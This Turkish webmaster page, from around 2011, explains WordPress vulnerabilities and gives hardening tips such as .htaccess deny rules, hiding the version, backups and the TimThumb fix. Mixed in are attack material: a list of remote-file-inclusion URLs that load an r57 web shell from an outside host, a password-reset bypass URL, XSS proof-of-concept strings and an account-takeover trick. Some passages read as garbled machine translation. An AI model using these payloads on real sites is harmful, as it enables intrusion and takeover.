'İstediğiniz Tüm Html kodlar Javascript kodlarına ve Css tsarımlarına Aşağıdaki Arama Motorunu Kullanarak Ulaşabilirsiniz. Siz de Sitenize Reklam Almak mı İstiyorsunuz O zaman TIKLAYINIZ."




Html Kodlar
ÖR: Ankara Tesisat
Yükleniyor...

INFOBILGI - Html kodlar, Seo, Webmaster

wordpress aciklari





WORDPRESS AÇIKLARI VE GÜVENLİK

Arkadaşlar mâlum blog'um var ve nette dolaşıyordum wordpress açıklarını kapamak gibisinden, wordpress hack için bazı mâkaleler yayınlamışlar ve bende size bildirmek istiyorum.

Saldırı türü 1:

Kullanıcı adınız: admin
mail adresiniz: admin@siteadresi.com

Admin şifrenizi alacak bir kişi sitenize şu şekilde üye oluyor:
Kullanıcı adı: admin veya @dmin
mail adresi: adı@e-mail.com

sonra mailine bakmadan şifremi unuttum kısmına geliyor ve kullanıcı adı ve mail adresini giriyor. Asıl admin şifresi karşıdaki kullanıcıya gidiyor.

Açığı kapatmak ve engellemek:
1-) üyelik sistemini kapatın.
2-) admin kullanıcısının mail'i daima site uzantısına bağlı mailde olsun. (admin@yazilimciyim.org gibi)
3-) blog yedeğinizi mutlaka hergün alın.
4-) sitenize bir çok emek verdiyseniz (yolun başında değilseniz) oluşabilecek en ufak tedirginliğinizde firmanıza danışın. 0nlar gerekli taramayı yapar sizden başka bağlanan olursa IP adresini alabilirsiniz.

Saldırı Türü 2:
RFI acıklarına dikkat.
Kod:
/plugins/links/functions.inc?_CONF[path]=http://creativerentacar.com/r57.txt?
/plugins/polls/functions.inc?_CONF[path]=http://creativerentacar.com/r57.txt?
/plugins/spamx/BlackList.Examine.class.php?_CONF[path]=http://creativerentacar.com/r57.txt?
/plugins/spamx/DeleteComment.Action.class.php?_CONF[path]=http://creativerentacar.com/r57.txt?
/plugins/spamx/EditIPofURL.Admin.class.php?_CONF[path]=http://creativerentacar.com/r57.txt?
/plugins/spamx/MTBlackList.Examine.class.php?_CONF[path]=http://creativerentacar.com/r57.txt?
/plugins/spamx/MassDelete.Admin.class.php?_CONF[path]=http://creativerentacar.com/r57.txt?
/plugins/spamx/MailAdmin.Action.class.php?_CONF[path]=http://creativerentacar.com/r57.txt?
/plugins/spamx/MassDelTrackback.Admin.class.php?_CONF[path]=http://creativerentacar.com/r57.txt?
/plugins/spamx/EditHeader.Admin.class.php?_CONF[path]=http://creativerentacar.com/r57.txt?
/plugins/spamx/EditIP.Admin.class.php?_CONF[path]=http://creativerentacar.com/r57.txt?
/plugins/spamx/IPofUrl.Examine.class.php?_CONF[path]=http://creativerentacar.com/r57.txt?
/plugins/spamx/Import.Admin.class.php?_CONF[path]=http://creativerentacar.com/r57.txt?
/plugins/spamx/LogView.Admin.class.php?_CONF[path]=http://creativerentacar.com/r57.txt?
/plugins/staticpages/functions.inc?_CONF[path]=http://creativerentacar.com/r57.txt?
/wp-content/plugins/wordtube/wordtube-button.php?wpPATH=http://creativerentacar.com/r57.txt?
/wp-content/plugins/wp-table/js/wptable-button.phpp?wpPATH=http://creativerentacar.com/r57.txt?
/wp-content/plugins/myflash/myflash-button.php?wpPATH=http://creativerentacar.com/r57.txt?
/wp-content/plugins/wordtube/wordtube-button.php?wpPATH=http://creativerentacar.com/r57.txt?
/wordpress/wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://creativerentacar.com/r57.txt?
/WordPress_Files/All_Users/wp-content/plugins/Enigma2.php?boarddir=http://creativerentacar.com/r57.txt?
bu uzantılara karşı önemlem alınız.

Saldırı türü 3:
Kesinlikle wordpress v2 sürümlerinden kurtulun.
Araştırmalarıma göre en çok açık wordpress 2.8.x sürümlerinde.
Güvenlik açığı şu şekilde çalışıyor:

Normalde şifre hatırlatma sayfası size bir kullanıcı adı veya e-posta adresi soruyor. Eğer bu geçerli ise de size e-posta ile bir link gönderiyor. Bu sırada şifre değişmiyor. Dolayısı ile de bunu gözardı edip işinize bakabilirsiniz.

Ve fakat kötü niyetli bir kişi adres çubuğuna aşağıdaki satırı yazarak Wordpress’i kandırabilir.
Kod:
http://www.blogismi.com/wp-login.php?action=rp&key[]=
Bunun sebebi Wordpress’in wp-login.php dosyasındaki bir hatadan kaynaklanıyor. Suçlu 190′ıncı satırda ki bu kod.
Kod:
if ( empty($key) )
olması gereken ise
Kod:
if (empty($key)) ||  is_array( $key )
Kısaca şifre değiştiren fonksiyon $key değişkenin geçersiz veya boş olması durumda değişikliğe izin vermiyor ama birisi boş bir array gönderirse durum değişiyor.

Wordpress eklentilerinde ki açıklar:
Eklentilerin sürümler halinde çıkmasına dikkat edin, wordpress.org veya türkçe sitesinden iyice araştırın. PHP diliniz varsa kodlamayı gözden geçirin. Eklentilerde bile ciddi hasarlar verebilecek kodlar, virüsler çıkabiliriyor.


WordPress Çoklu Komut Dosyası Ekleme Güvenlik Açıkları
Keyfi kod enjeksiyonu sağlayan mesajları silerken kullanıcı doğrulama eksikliği açıklanan "Samenspender" tarafından - Stefan Friedli "0day WordPress adminpanel CSRF / XSS" başlıklı bir danışmaya dayanarak çeşitli aksaklıklar bulunabilir. Güvenlik açığı, Şubat 26 tarihinde bildirilmiştir ve bölüm VII başvurulmaktadır.
"Post"-parametre manipüle sınırlı olan bu açığı ek olarak, yukarıda belirtilen bir çok benzeyen diğer bazı güvenlik açıkları vardır.Ortak onaylamak-iletişim kullanan her işletme, bu tür saldırıları için savunmasızdır.

Olası enjeksiyon ...
Samenspender danışma belgesinde belirtildiği gibi (Mesaj, dosya: Post.php parametre Kontrol Edilmemiş)
Kod:
http://target.tld/wp-admin/post.php?action=delete &post='>
Yorum Silerken: (kontol edilmesi gereken dosya: comment.php)
Kod:
http://target.tld/wp-admin/comment.php?action=
WordPress MU wpmu-Blogs.php Crose Site Güvenlik Açığı Scrpting
Bağışıklık Sistemleri:
* Wordpress-MU sürüm 2.6.x ve 2.x.x

/ Wp-admin/wpmu-blogs.php bir saldırganın javascript kodu, giriş değişkenleri "s" ve yöntem doğru dezenfekte değil GET "ip_address" enjekte edebilir.
Burada bir POC gibidir:
Kod:
PoC: http://site/path/wp-admin/wpmu-blogs.php?action=blogs&s =% 27 [XSS]
PoC: http://site/path/wp-admin/wpmu-blogs.php?action=blogs&ip_address =% 27 [XSS]
WordPress birden çok XSS güvenlik açıkları
WordPress sürümü 1.2.2 (pek fazla kullanan olmayacaktır zaten olmasında )

wp-login.php CSS:
Aşağıdaki kodu wp-login.php dosyasının içinde görülebilir:
Kod:
> If (dirname ('http://'. $ _SERVER ['HTTP_HOST']. $ _SERVER ['REQUEST_URI'])! = Get_settings ('siteurl'))
> UPDATE_OPTION ('siteurl', dirname ('http://' $ _SERVER ['HTTP_HOST'] $ _SERVER ['REQUEST_URI'])..);
Gibi bir URI ile
/ Wp-login.php ?=">< script> alert (document.cookie) </ script> </ script>
Saldırgan, global siteurl ortamda keyfi değerleri saklayabiliyor.

Açık bulunan wp-login.php ek bir parametre 'redirect_to "dir.
Çoklu / wp-admin / CSS:
Aşağıdaki dosyaları ve bunlara karşılık gelen parametreleri çapraz site komut dosyası açıklarını açıktır:

/ Wp-admin/bookmarklet.php? Popupurl = [XSS]
/ Wp-admin/bookmarklet.php? Içerik = [XSS]
/ Wp-admin/edit-comments.php? S = [XSS]
/ Wp-admin/edit-comments.php? S = bla & submit = Arama & mode = [XSS]
/ Wp-admin/templates.php? File = [XSS]
/ Wp-admin/link-add.php? Linkurl = [XSS]
/ Wp-admin/link-add.php? Name = [XSS]
/ Wp-admin/link-categories.php? Cat_id = [XSS] & action = Düzenle
/ Wp-admin/link-manager.php? Order_by = [XSS]
/ Wp-admin/link-manager.php? Cat_id = [XSS]
/ Wp-admin/link-manager.php? Action = linkedit & LINK_URL = [XSS]
/ Wp-admin/link-manager.php? Action = linkedit & link_name = [XSS]
/ Wp-admin/link-manager.php? Action = linkedit & link_description = [XSS]
/ Wp-admin/link-manager.php? Action = linkedit & link_rel = [XSS]
/ Wp-admin/link-manager.php? Action = linkedit & link_image = [XSS]
/ Wp-admin/link-manager.php? Action = linkedit & link_rss_uri = [XSS]
/ Wp-admin/link-manager.php? Action = linkedit & link_notes = [XSS]
/ Wp-admin/link-manager.php? Action = linkedit & link_id = [XSS]
/ Wp-admin/link-manager.php? Action = linkedit & order_by = [XSS]
/ Wp-admin/link-manager.php? Action = linkedit & cat_id = [XSS]
/ Wp-admin/post.php? Içerik = [XSS]
/ Wp-admin/moderation.php? Action = güncelleştirme & item_approved = [XSS]
Çözüm: Sürüm yükseltin.

--- 9 Kasım 2011 --

Wordpress 3.2.1 Açığı :
Wordpress yayımlanan sorun sürümü (3.2.1) büyük bir ilgi gördü aslında, ama bir çok websitelerinin saldıraya uğrayım kulayca hacklenmesi ilginç ve siz wmaracı üyeleri için bazı yabancı bloglarda araştırma yaptım yazanlar şu şekilde:
- WordPress'de yayımlanan açıklamaya göre, bu yükseltme ağırlıklı olarak JSON, yeni gösterge paneli ve yeni TwentyEleven teması için bazı düzeltmeler yapılmalıdır veya ilgili sunucu wordpress 3.2.1 sürümü ile uyumsuzluk göstermektedir, blog'unuz şuanda 3.2.1 sürümü kurulu ise bunlar dikkat edin ve Automattic eklentisi ekliyse bir daha ki sürüme kadar etkinsizleştirin.
Sağlam bir .htaccess dosyası:
Sağlam bir .htaccess için dosyamızın içine bir takım kodlar eklememiz gerekmekte. Hemen yazalım :
[code9<files .htaccess>
order allow,deny
deny from all
</files>[/code]
Bu kod servera sızan herhangi bir hacker abinin .htaccess dosyamıza ulaşmasını engelliyor. Bir nevi .htaccess dosyasını erişime kapatıyoruz.

Önemli unsurlardan birisi :
Kod:
<files wp-config.php>
order allow,deny
deny from all
</files>
Bu kod yardımıyla wp-config.php dosyasına yani database bilgilerimizin bulduğu dosyaya erişimi engelliyoruz. Bu da bizim için büyük bi önlem.
Kod:
<files wp-load.php>
order allow,deny
deny from all
</files>
Ne olur ne olmaz wp-load.php dosyasına da erişimi engelliyelim
Kod:
Options All -Indexes
Yukarıdaki kod sayesinde de dizin listenmesini iptal ediyoruz ve hacker abiler sunucumuzda hangi klasörde hangi dosyalar var göremiyor.
Kod:
ServerSignature Off
Wp-admin sayfasındaki yanlış kullanıcı adı, yanlış şifre gibi hata bildirimlerini devre dışı bırakın. Büyük fayda sağlar. Bunu nasıl yapacağız diyeceksiniz. Şöyle;
Kod:
add_filter(’login_errors’,create_function(’$a’, “return null;”));
Yukarıdaki kodu temanızın functions.php dosyasına ekleyin.

Sık Yedek Alın

Eskilerin “Hırsıza kilit dayanmaz” diye bir lafı vardır. Özellikle de internet gibi bir ortamda hangi önlemi alırsanız alın, bir risk taşıdığınızı unutmamanız lazım. O yüzden alınacak ilk önlem sık sık yedek almak olmalı. WordPress’te bu işi otomatik olarak yapmaya yarayan eklentiler mevcut. (ör: WP-DB-Backup)

Güncellemeleri Sıkı Takip Edin

WordPress, kendi sürümü ve ilgili eklentilerin güncellemelerini kolaylıkla takip edebilmeniz için pek çok imkan sunuyor. Yayınlanan güncellemeleri kurma işini aksatmayın. Çünkü her güncelleme genelde bazı güvenlik açıkları için de yamalar sunuyor.

Yönetici Kullanıcı Adını Değiştirin

WordPress, ilk kurulumda otomatik olarak yönetici hesabının kullanıcı adını “admin” olarak atıyor. Bu da özellikle doğrudan yönetim panelini ele geçirmek için yapılan kaba kuvvet saldırıları (Brute Force) için bir güvenlik tehdidi oluşturuyor. O yüzden yönetici kullanıcı adını ya database yönetim programı (phpmyadmin) üzerinden ya da yine bir eklenti kullanarak değiştirin.

Kuvvetli Bir Şifre Kullanın

Maalesef çoğumuz çok da kuvvetli olmayan, internetten hakkımızda toplanabilecek basit verilerle tahmin etmesi nispeten kolay şifreler kullanıyoruz. Hatta bu şifreleri genelde sitelere göre de farklılaştırmayıp pek çok yerde kullanıyoruz. Öncelikle, yönetim hesabı şifrenizin karakter zenginliğini ve uzunluğunu arttırıp şifrenizi daha kuvvetli yapın. Siteniz için kullandığınız şifreyi başka yerlerde kullanmayın. Veritabanı için ayrı bir kullanıcı adı tanımlayın ve farklı bir şifre kullanın.



--- 14 Kasım 2011 --

GoDaddy Hakkında
GoDaddy üzerindeki WordPress blogları geçtiğimiz günlerce hacklendi.

Ortaya çıkan tehlikeli durum hakkında yapılan açıklama, sorunun sunucularda değil WordPress’te olduğu yönündeydi.

WordPress’e düzenlenen saldırı botnet yöntemine benzer bir şekilde yürütüldü . Bu esnada Amerikan Hazinesi’nin sitesine yapılan saldırının da nasıl yapıldığu anlaşılmış oldu. WordPress’in önceki sürümlerinde açıklar bulundu.

Bu sorundan korunmak için yapılması gereken şey çok basit: WordPress’i güncelleyin. Bazı kullanıcılar modül uyumsuzlukları yüzünden eski sürümleri kullanmaya devam ediyor. Ancak tarihi geçmiş eski sürümler, güvenlik açıklarıyla siteleri ve ziyaretçilerini riske atıyor.

WordPress Versiyon Bilgisi

Sitenizin altyapısını wordpress oluşturmasından ne kadar memnun da olsanız, bu bilgiyi bazen saklamanız gerekir. Saklanması gereken bir bilgi olmamasına rağmen, kötü niyetli insanlar sitenizi google’da kısa süre içinde kısa bir araştırma ile bulabilirler. Bunu kaldırmak için yapmanız gereken şey basit; sitenizde kullandığınız temanın functions.php yani tema işlevleri bölümüne gelip, en alta ya da en üste şu kodu eklemeniz,

Kod:
 function remove_version() { return ”; } add_filter(‘the_generator’, ‘remove_version’);
Sitenizin PHP Versiyonu Kontrolü
Sitenizin php versiyonunu herkesin görebileceği şekilde ayarlamak çok da akıllıca bir şey değil, çünkü saldırmak isteyen kişiler öncelikli olarak site versiyonuna bakacaktır ki bu da onların işini çok kolaylaştıracaktır. Bu versiyon kontrolü olayını kaldırmak için yer sağlayıcınız ile görüşebilirsiniz. Ama yapabileceğiniz bir şey daha var. .htaccess kodunuza gidip, şu kodları ekleyin.

Kod:
<IfModule mod_headers.c> Header unset X-Powered-By Header unset Server </IfModule>
Database Şifrenizin Sağlamlığı
WordPressinizi kurarken sahip olduğunuz database şifreniz gerçekten çok önemli. Bu şifreyi kesinlikle basit yazı ve rakamlardan oluşan kombinasyonlarla kullanmayın. Eğer nasıl bir şifre oluşturmanız gerektiğini bilmiyorsanız, http://strongpasswordgenerator.com/ sitesini ziyaret ederek sizin için güçlü bir şifre üretmesini sağlayabilirsiniz. Database şifrenizi değiştirmek için sitenizin cpaneline gelip, mysql bölümünden şifre değişikliğinizi yapabilirsiniz. Bu değişikliği yaptıktan sonra wp-config.php dosyanızdan database şifrenizi de lütfen değiştirmeyi unutmayın.

Son Olarak
Sitenize sizin yapabileceğiniz güvenlik önlemleri bu kadar. Ancak, açıklar hiçbir zaman bitmez, ve azimli bir saldırgan sitenize gerçekten zarar verebilir. Bizim yapmaya çalıştığımız ise burada onları caydırabildiğimiz kadar caydırmak.

Bunu yaparken sizin yapabilecekleriniz ve sitenizin barındığı yerin yapabileceği şeyler ortak seviyede. Onlarda kod ekleyecek, siz de.

Bu arada, wp-uploads klasörüne sakın 777 izni vermeyin.

WordPress SEO XSS Güvenlik Açığı

Normalde WordPress üzerinde böyle bir güvenlik açığı yok. Sorun WordPress üzerine SEO için eklenen birkaç koddan kaynaklanıyor.
WordPress’in SEO sistemini geliştiren eklentiler yanı sıra ek kodlarda birçok kişi tarafından tavsiye edilip insanlara kullanılması gerektiği önerilmekte. Fakat bu eklenen kodlar arasında en meşhur olanlarından bir tanesi WordPress sisteminiz üzerinde bir güvenlik riski ortaya çıkarabilmekte. Bu açığı TEAkolik (Hamza Şamlıoğlu) yaptığı testler sonucu ortaya çıkardı. Peki açık nasıl oluşuyor ve çözümü nedir derseniz buyrun yazıyı okuyun.
XSS Güvenlik açığını ortaya çıkaran kodlar;

Kod:
<meta name="description" content="<?php if (is_home() ) {?><?php bloginfo('description');} elseif ( is_single() ) { ?><?php wp_title(''); ?> , <?php $cat = get_the_category(); $cat = $cat[0]; echo $cat->cat_name; ?> , <?php bloginfo('description'); } elseif ( is_page() ) { ?><?php wp_title(''); ?> , <?php bloginfo('description'); } elseif ( is_category() ) { ?> <?php single_cat_title('');?> , <?php bloginfo('description'); } elseif ( is_archive() ) { ?><?php wp_title(''); ?> , <?php bloginfo('description'); } elseif ( is_search() ) { ?> <?php echo $s; ?> , <?php bloginfo('description'); } elseif (is_tag()) {$tagTitle = preg_replace('/-/' , ' ' , $tag); echo ucwords($tagTitle); ?> , <?php $cat = get_the_category(); $cat = $cat[0]; echo $cat->cat_name; ?> , <?php bloginfo('description'); } else { ?><?php wp_title(''); ?> , <?php bloginfo('description'); }?>" />
Yukarıda ki kod WordPress için hazırlanmış bir SEO kodudur. Birçok SEO forumunda, birçok forumda ve internet sayfasında bu kodu temanızın header.php dosyasına eklerseniz Google seo uyumu için çok yararlı olduğu belirtilmekte. Yalan da değil. Bu kodlama sayesinde “meta description” etiketiniz işlevsellik kazanıyor ve Google gözünde çok daha iyi sonuçlar verebilmesi sağlanılabiliyor. Fakat bu kod içerisinde unutulmuş bir yapı var.

XSS Güvenlik Açığı;
Eğer ki WordPress sisteminize eklediğiniz tema içerisinde bu tip bir SEO kodlaması varsa, SEO için yazılan bazı makaleleri okuyup bu kodu sisteminize eklediyseniz yada birilerine SEO yaptırdıysanız bu başınıza büyük bir iş açabilir. Bu kodlama sayesinde kötü niyetli bir kişi blogunuza saldırıp sisteminizi hacklemesi malesef ki an meselesi…

http://www.siteadi.com/?s='"><script>alert(1)</script>

Bu şekilde WordPress sisteminizde XSS olup olmadığını görebilirsiniz. Eğer ki siteniz size bir popup mesaj verirse sisteminizde güvenlik riski var demektir.

Normalde WordPress içerisinde bu tip bir kodlama yok;

WordPress’in standardında bu tip bir kodlama yok. Fakat fonksiyonlar yukarıdaki gibi bir araya getirilip SEO’cu arkadaşlar tarafından böyle bir kod ortaya çıkarılmış durumda. Bu sayede temanızın header.php dosyasına ekleyip kullanabiliyorsunuz. Fakat risk çok büyük. Özelliklede birçok forumda bu kodu temanıza ekleyin diye yazmış kişiler var. Bu kodu birçok kişi blogunda şuan itibari ile kullanıyor. Bazı temaların ise standardında bu kod gelebilmekte.

Kısacası risk altında olabilirsiniz..!

WordPress timthumb açığı hakkında bilgi
Gönderilen verinin alınmadan önce filtrelenmemesinden dolayı kaynaklanan bir açıktır. Eğer ki gönderilen veri ve ya alınan veri filtrelenmezse ve script bu veriyi eval() komutu ile dönderirse
dönderilen veri bir php betiği olarak çalışacaktır.
Açık: WordPress TimThumb Plugin – Remote Code Execution
Açığın kapatılması
Kod:
$allowedSites = array (
    'flickr.com',
    'picasa.com',
    'blogger.com',
    'wordpress.com',
    'img.youtube.com',
);
Açığın Kapatılması:
Kod:
$allowedSites = array ();
Bu şekilde başka sitelere yazma izni engellenmiş oluyor.

Not: Bu kodlar timthumb.php dosyası içerisinde yer almaktadır. Sitenizdeki tüm timthumb dosyalarını inceleyip düzeltmeniz gerekiyor.
TimThumb kullanan eklentilerin listesi
portfolio-slideshow-pro
wp-mobile-detector
a-wp-mobile-detector
igit-related-posts-with-thumb-images-after-posts
dukapress
verve-meta-boxes
db-toolkit
logo-management
wp-marketplace
islidex
aio-shortcodes
category-grid-view-gallery
WPFanPro
igit-posts-slider-widget
wordpress-gallery-plugin
cms-pack
Premium_Gallery_Manager
dp-thumbnail
placid-slider
nivo-slider
photoria
LaunchPressTheme
kc-related-posts-by-category
journalcrunch
download-manager
wordpress-thumbnail-slider
sugar-slider
optimizepress
TimThumb kullanan temaların listesi
Minimo
Polished
Minimal
nebula
TheCorporation
TheStyle
TuaranBlog
striking
MyCuisine
AskIt
Webly
Aggregate
TheSource
reviewit
kelontongfree
Mentor
SimplePress
journalcrunch
ecobiz
Magnificent
timthumb.php
Olympia
kingsize
Chameleon
DelicateNews
videozoom-v2.0-original
videozoom
Envisioned
twicet
u-design
genoa
OptimizePress
Modest
mocell
ephoto
Theme
InReview
lightpress
hostme
PersonalPress
Cadca
arras
tiwinoo_v3
MyProduct
sc4
InterPhaseTheme
InStyle
LightBright
TheProfessional
mnfst
freshnews
ArtSee
Boutique
eStore
Avenue
twentyten
XSWordPressTheme
adcents
Nova
MyPhoto
eGallery
Striking_Premium_Corporate
default
Lycus
manifesto
cold
DynamiX
tarnished
Nyke
linepress
DJ
adria
zimex
peano
ElegantEstate
delight
kelontong-free
duotive-three
SobhanSoft_Theme
PureType
yamidoo_pro
vulcan2.1
eGamer
Wooden
peritacion
AmphionPro
trinity
dandelion_v2.6.3
Juggernautgrande
juggernaut-theme
BlackLabel_v1.1.2
Feather
reviewit1
zinepress_v1.0.1
tribune
photoria
vilisya
DailyNotes
Basic
minerva
anthology_v1.4.2
ModestTheme
purevision
parquet
framed-redux
eceramica
InterPhase
epsilon
Striking
thedawn
peava
Newspro
telegraph
averin
telegraph_v1.1
Memoir
NewsPro
CircloSquero
vassal
maxell
13Floor
wpanniversary
OnTheGo
Glider
mohannad-najjar222
mohannad-najjar2
arthemia
tuufy7
photoframe
beach-holiday
blacklabel
cadabrapress
snapwire
bizpress
themesbangkoofree
TOA
D4
eNews
vulcan
overtime
rockwell_v1.0
vicon
wideo
CherryTruffle
mio
rttheme13
Linepress
DeepFocus
advanced-newspaper202
OptimusPrime
Quadro
Lumin
minima
identity
U-design.v1.1.2_hkz
KP
Petra
services
13FloorTheme.php
BD
PolishedTheme
13FloorTheme
kiwinho
graphix
jerestate
centro
corage
Reporter
TheTravelTheme
XSBasico
openhouse
seosurfing1
bluebaboon
Newspro-2.8.6
nd
zoralime
GrupoProbeta
eBusiness
purplex
kitten-in-pink
FashionHouse
WhosWho
Deviant
Bold
BusinessCard
EarthlyTouch
GrungeMag
LightSource
Simplism
TidalForce
Glow
Influx
StudioBlue
jpmegaph
redina
tritone
dandelion_v2.5
Bluesky
ColdStone
silveroak
newspro
GamesAwe
caratinga.net
SimplePressTheme
MyResume
MyApp
theme
bigcity
dandelion_v2.6.1
chronicle
cuizine
thesis_18
advanced-newspaper_new
Event
wpbedouine
rt_affinity_wp
arry12
backup-TheStyle
ExploreFeed
zzzzzzzzz
Bluemist
Hermes
cleartype_v1.0
polariswp
Chameleon 1.6
sniper
adena
ariela
FreshAndClean
wp-creativix


Şuanda wordpress 3.2.1 version'unu kullanmanızı tavsiye etmiyoruz...
Kendinizi güvene almak için mutlaka güncel version kullanın: wordpress 3.2.1.zip
Türkçe WP 3.2.1: wordpress 3.2.1.tr.zip

Bu Başlığı Güncel Olarak Takip Edin.
Güncel Açıklar Burayada Paylaşılacaktır.



Sitemizden Bugün Toplam 50 ziyaretçi (323 klik) Kod (ç)aldı


************************************************************
SİZDE ZİYARETÇİ SAYINIZI ARTIRMAK İSTİYORSANIZ.
AŞAĞIDAKİ KODU SİTENİZE EKLEYİN.
************************************************************


Copyright InfoBilgi © 2011 - 2015
Kullanım Şartları Site Haritası
Azadi Blogger Wordpress Tumblr Ankara Tesisat
TOPlist
sosyal imleme ping fast  my blog, website, or RSS feed for Free
=> Sen de ücretsiz bir internet sitesi kurmak ister misin? O zaman burayı tıkla! <=